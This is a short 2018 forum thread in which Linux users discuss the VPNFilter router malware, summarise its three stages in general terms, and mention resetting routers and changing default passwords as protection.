1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

VPNFilter Attacks Home Routers

Discussion in 'Hardware' started by booman, Jun 5, 2018.

  1. booman

    booman Grand High Exalted Mystic Emperor of Linux Gaming Staff Member

    Joined:
    Dec 17, 2012
    Messages:
    7,269
    Likes Received:
    527
    Trophy Points:
    113
    Location:
    Linux, Arizona
    Home page:
    Have you guys heard of this Router attack?
    How does it work exactly?
    How does it affect Linux user?

    https://www.experian.com/blogs/ask-...king-your-wifi-router-heres-how-to-stop-them/

    1. Stage 1 involves a worm and adds it to the crontab, the list of tasks run at regular intervals by the cron scheduler on Linux. This allows it to remain on the device, to re-infect it with the subsequent stages if they are removed.
    2. Stage 2 is the actual body of the malware, including the basic code that carries out all normal functions and executes any instructions requested by special, optional Stage 3 modules.
    3. Stage 3 can be any of various "modules" that tell the malware to do specific things, like spying on industrial control devices (Modbus SCADA) or using secure "dark web" Tor software to communicate via encryption.[4]
    Last edited: Jun 6, 2018
  2. danrok

    danrok Administrator Staff Member

    Joined:
    Dec 7, 2012
    Messages:
    1,365
    Likes Received:
    14
    Trophy Points:
    38
    Location:
    Channel Islands
    There's more here:
    https://en.wikipedia.org/wiki/VPNFilter

    They say resetting a router to factory defaults would wipe it, and that not using the default password for your router makes it less likely to become infected.
  3. booman

    booman Grand High Exalted Mystic Emperor of Linux Gaming Staff Member

    Joined:
    Dec 17, 2012
    Messages:
    7,269
    Likes Received:
    527
    Trophy Points:
    113
    Location:
    Linux, Arizona
    Home page:
    So the router it-self is infected?
    Like the embedded Linux OS in it?
  4. danrok

    danrok Administrator Staff Member

    Joined:
    Dec 7, 2012
    Messages:
    1,365
    Likes Received:
    14
    Trophy Points:
    38
    Location:
    Channel Islands
  5. booman

    booman Grand High Exalted Mystic Emperor of Linux Gaming Staff Member

    Joined:
    Dec 17, 2012
    Messages:
    7,269
    Likes Received:
    527
    Trophy Points:
    113
    Location:
    Linux, Arizona
    Home page:
    That is brilliant and "not cool" at the same time.
    Hacking an embedded Linux on a router and recording data passing through it.
    I might reset mine just to be sure.
  6. cloasters

    cloasters Well-Known Member

    Joined:
    Jul 3, 2013
    Messages:
    1,833
    Likes Received:
    43
    Trophy Points:
    48
    Yes, I'll pull the plug on mine one more time.

Share This Page